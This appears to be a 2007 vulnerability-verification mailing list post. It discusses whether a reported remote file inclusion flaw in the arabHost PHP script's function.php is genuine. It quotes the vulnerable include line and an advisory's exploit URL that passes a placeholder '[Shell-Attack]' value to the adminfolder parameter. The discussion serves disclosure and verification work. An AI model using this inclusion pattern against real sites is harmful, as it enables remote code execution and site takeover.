[VIM] Verified: arabhost function.php RFI

str0ke str0ke at milw0rm.com
Tue Feb 27 10:20:02 EST 2007


Bill "That's False Too!" Heinbockel,

I umm tested this awhile back and the file did exist includes/protaction.php. :(

In the email back to the author I stated.

includes/protaction.php contains $adminfloder :(

Very strange.

/str0ke

On 2/27/07, Heinbockel, Bill <heinbockel at mitre.org> wrote:
> BUGTRAQ:20070222 Hasadya Raed
> http://www.securityfocus.com/archive/1/archive/1/460933/100/0/threaded
>
> > B.File :
> > function.php
> >
> > V.Code :
> > include($adminfloder");
> >
> > Expl :
> http://www.victim.com/path/function.php?adminfolder=[Shell-Attack]
>
>
> Since the script download at
> http://delmaa.com/upfile/users/arabHost.zip
> is currently 404. I'll refer to the Google Code cache of
> arabHost/function.php:
>
> http://www.google.com/codesearch?hl=en&q=show:y_09L32ZX4g:c-H4PKvziZc:C
> SW92BIlIMw&sa=N&ct=rd&cs_p=http://delmaa.com/upfile/users/arabHost.zip&
> cs_f=arabHost/function.php
>
> Code (lines 1-4):
> > <?php
> >
> > include("includes/protaction.php");
> > include("$adminfloder/config.php");
>
> And the package contains no "includes/protaction.php" file (and
> the ReadMe.html is in Arabic), so this issue does appear valid.
>
>
> Sorry jericho, no disputes this time.
>
> Bill "That's False Too!" Heinbockel
> Infosec Engineer
> The MITRE Corporation
> 202 Burlington Rd. MS S145
> Bedford, MA 01730
> heinbockel at mitre.org
> 781-271-2615
>


More information about the VIM mailing list